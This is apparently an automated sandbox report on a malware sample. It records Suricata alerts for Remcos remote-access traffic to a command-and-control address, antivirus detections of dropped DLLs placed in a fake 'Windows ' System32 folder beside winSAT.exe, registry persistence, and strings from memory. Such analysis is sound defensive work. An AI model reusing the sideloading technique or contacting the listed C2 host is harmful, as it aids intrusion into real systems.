2024-12-06T17:36:45.467396+010020365941Malware Command and Control Activity Detected192.168.2.450072185.42.12.392404TCP
2024-12-06T17:36:47.620612+010020365941Malware Command and Control Activity Detected192.168.2.450073185.42.12.392404TCP
2024-12-06T17:36:49.764288+010020365941Malware Command and Control Activity Detected192.168.2.450074185.42.12.392404TCP
2024-12-06T17:36:51.764318+010020365941Malware Command and Control Activity Detected192.168.2.450075185.42.12.392404TCP
2024-12-06T17:36:53.837814+010020365941Malware Command and Control Activity Detected192.168.2.450076185.42.12.392404TCP
2024-12-06T17:36:55.967513+010020365941Malware Command and Control Activity Detected192.168.2.450077185.42.12.392404TCP
2024-12-06T17:36:58.142515+010020365941Malware Command and Control Activity Detected192.168.2.450078185.42.12.392404TCP
2024-12-06T17:37:00.154962+010020365941Malware Command and Control Activity Detected192.168.2.450079185.42.12.392404TCP
2024-12-06T17:37:02.154997+010020365941Malware Command and Control Activity Detected192.168.2.450080185.42.12.392404TCP
2024-12-06T17:37:04.154928+010020365941Malware Command and Control Activity Detected192.168.2.450081185.42.12.392404TCP
2024-12-06T17:37:06.154956+010020365941Malware Command and Control Activity Detected192.168.2.450082185.42.12.392404TCP
2024-12-06T17:37:08.072559+010020365941Malware Command and Control Activity Detected192.168.2.450083185.42.12.392404TCP
2024-12-06T17:37:10.154959+010020365941Malware Command and Control Activity Detected192.168.2.450084185.42.12.392404TCP
2024-12-06T17:37:12.154942+010020365941Malware Command and Control Activity Detected192.168.2.450085185.42.12.392404TCP
2024-12-06T17:37:14.061255+010020365941Malware Command and Control Activity Detected192.168.2.450086185.42.12.392404TCP
2024-12-06T17:37:15.967474+010020365941Malware Command and Control Activity Detected192.168.2.450087185.42.12.392404TCP
2024-12-06T17:37:17.960639+010020365941Malware Command and Control Activity Detected192.168.2.450088185.42.12.392404TCP
2024-12-06T17:37:19.967485+010020365941Malware Command and Control Activity Detected192.168.2.450089185.42.12.392404TCP
2024-12-06T17:37:21.967522+010020365941Malware Command and Control Activity Detected192.168.2.450090185.42.12.392404TCP
2024-12-06T17:37:23.967486+010020365941Malware Command and Control Activity Detected192.168.2.450091185.42.12.392404TCP
2024-12-06T17:37:25.764587+010020365941Malware Command and Control Activity Detected192.168.2.450092185.42.12.392404TCP
2024-12-06T17:37:27.655095+010020365941Malware Command and Control Activity Detected192.168.2.450093185.42.12.392404TCP
2024-12-06T17:37:29.674497+010020365941Malware Command and Control Activity Detected192.168.2.450094185.42.12.392404TCP
2024-12-06T17:37:31.467515+010020365941Malware Command and Control Activity Detected192.168.2.450095185.42.12.392404TCP
2024-12-06T17:37:33.467571+010020365941Malware Command and Control Activity Detected192.168.2.450096185.42.12.392404TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dllReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dllReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dllReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dllReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dllReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\MyElectronApp\version.dllReversingLabs: Detection: 62%
Source: C:\Windows \System32\version.dllReversingLabs: Detection: 15%
Source: YoS6ZBCcUy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\31e24c48-f042-5745-a165-04e896e763b7Jump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\LICENSE.electron.txtJump to behavior
Source: YoS6ZBCcUy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb<: source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2147033936.0000000004B82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ffmpeg.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb,q source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vulkan-1.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2197462818.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2147240320.0000000004B70000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2074996101.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077198025.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2075174807.0000000004970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: electron.exe.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: libGLESv2.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll15\Release\Dll15.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vk_swiftshader.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2143596568.000000000475E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\s\Win32\Release\BGInfo.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059CC
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,19_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,22_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,22_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251B68 FindFirstFileExW,22_2_00007FFE10251B68
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE10251CEC FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_00007FFE10251CEC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD34C4 FindFirstFileW,GetLastError,FindClose,SetLastError,_CxxThrowException,31_2_00007FF780FD34C4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FC90DC SetLastError,FindFirstFileW,GetLastError,FindClose,SetLastError,CreateFileW,ReadFile,GetLastError,CloseHandle,CloseHandle,31_2_00007FF780FC90DC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE453DC FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00007FFDFFE453DC
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE45258 FindFirstFileExW,31_2_00007FFDFFE45258
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\Programs\NSIS\resourcesJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\Programs\NSISJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile opened: C:\Users\user\AppData\Local\ProgramsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49754 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49760 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49783 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49798 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49806 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49812 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49790 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49766 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49777 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49835 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49826 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49819 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49841 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49883 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49847 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49853 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49863 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49892 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49905 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49969 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49921 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49927 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49998 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49940 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49898 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49912 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49978 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50011 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49956 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49985 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50039 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50020 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50045 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50057 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50060 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49934 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50005 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49950 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50068 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50066 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50065 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50059 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50076 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50070 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50078 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49869 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49992 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50063 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50071 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50075 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50067 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50082 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50077 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50064 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50069 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50080 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50062 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50089 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50086 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50027 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49963 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50088 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50061 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50093 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50095 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50058 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50079 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50094 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50083 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50081 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50033 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50085 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50091 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50074 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50096 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50072 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50087 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50090 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50092 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50073 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50052 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50084 -> 185.42.12.39:2404
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50097 -> 185.42.12.39:2404
Source: global trafficTCP traffic: 192.168.2.4:49754 -> 185.42.12.39:2404
Source: Joe Sandbox ViewASN Name: MULTIHOST-ASRU MULTIHOST-ASRU
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: unknownTCP traffic detected without corresponding DNS query: 185.42.12.39
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: * **Google Hangouts Video**: http://www.youtube.com/watch?v=I9nDOSGfwZg equals www.youtube.com (Youtube)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2x.io)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.izs.me/)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cldr.unicode.org/index/downloads
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
